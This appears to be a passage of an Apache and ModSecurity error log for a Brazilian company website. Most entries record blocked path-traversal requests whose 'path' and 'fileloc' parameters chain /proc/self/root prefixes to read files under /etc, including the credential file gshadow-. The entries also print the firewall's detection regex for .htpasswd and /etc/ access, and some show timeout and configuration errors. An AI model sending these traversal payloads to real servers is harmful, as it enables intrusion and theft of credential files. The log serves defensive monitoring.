[uri "/"] [unique_id "abu0y-yqAr6etmhZHNo5ZQAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:33:36.147962 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.243.128:52090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu04BkFeYa1D6dYQnDFAwAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:33:58.738949 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:28024] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu09uyqAr6etmhZHNo5hgAAAEk"]
[Thu Mar 19 05:34:05.447675 2026] [core:alert] [pid 17887:tid 140411658000128] [client 57.141.18.63:34796] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:34:18.397835 2026] [proxy_fcgi:error] [pid 27293:tid 140411683178240] (70007)The timeout specified has expired: [client 45.227.253.15:39170] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:34:40.185871 2026] [proxy_fcgi:error] [pid 17887:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60822] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:35:01.178024 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:33160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:35:11.791128 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.228.61:37646] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu1PwkwaGbbGflqUZCM6AAAANU"]
[Thu Mar 19 05:35:23.131276 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:33718] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:35:46.153830 2026] [proxy_fcgi:error] [pid 17887:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34356] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:36:07.785912 2026] [proxy_fcgi:error] [pid 15826:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:35032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:36:18.732335 2026] [core:alert] [pid 30077:tid 140411565680384] [client 57.141.18.9:37724] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 05:36:29.163988 2026] [proxy_fcgi:error] [pid 30077:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:35650] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:36:50.049866 2026] [proxy_fcgi:error] [pid 17653:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:37:11.121791 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:36774] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:37:25.385494 2026] [:error] [pid 19093:tid 140411683178240] [client 74.7.244.43:45388] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abu1xV_V7PWP6ixUYl6SIQAAAoc"]
[Thu Mar 19 05:37:32.129794 2026] [proxy_fcgi:error] [pid 14269:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37324] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:37:51.931843 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:41014] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu13wkwaGbbGflqUZCNfwAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:37:53.129032 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:37844] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:37:57.703354 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:48538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu15eoXxyEfFpUF8f_nGwAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 05:38:14.151732 2026] [proxy_fcgi:error] [pid 27403:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38410] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:38:26.361472 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:48554] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Ata6ubjKNq_cu4YaAwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:38:35.137872 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:38936] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:38:47.169166 2026] [:error] [pid 27403:tid 140411649607424] [client 74.7.243.128:58248] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2FxkFeYa1D6dYQnDFqwAAAcs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:38:50.720670 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.243.128:41220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2GuyqAr6etmhZHNo6OQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:38:57.327767 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.243.128:49558] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/polkit-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2IQbLMZ6AikZjR9Uz8wAAABM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:38:58.129813 2026] [proxy_fcgi:error] [pid 19093:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:39466] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 05:38:58.879144 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:49574] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Ita6ubjKNq_cu4YaFAAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:38:59.499762 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:49504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2I8df6f5d65gmYZRKVAAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:00.764436 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:49504] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2JMdf6f5d65gmYZRKVQAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:02.647537 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:49508] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2JgkwaGbbGflqUZCNsQAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:04.269954 2026] [:error] [pid 27293:tid 140411716749056] [client 74.7.243.128:49512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2KP-YZRR_7pZ7nDJkTQAAA8M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:06.095092 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.243.128:49526] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2KuyqAr6etmhZHNo6QgAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:07.765803 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:49534] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2K9a6ubjKNq_cu4YaIAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:09.351960 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.243.128:49544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2Lfu8EFLIOrSqIpt2DQAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:15.286639 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:31242] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2M9a6ubjKNq_cu4YaKAAAA0w"]
[Thu Mar 19 05:39:15.449551 2026] [:error] [pid 30077:tid 140411708356352] [client 74.7.243.128:47762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2M_u8EFLIOrSqIpt2EwAAAkQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 05:39:15.528339 2026] [mime_magic:error] [pid 26799:tid 140411565680384] (70014)End of file found: [client 57.141.18.21:42488] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 05:39:17.717019 2026] [:error] [pid 19093:tid 140411574073088] [client 74.7.243.128:47772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abu2NV_V7PWP6ixUYl6SfwAAApQ"], referer: 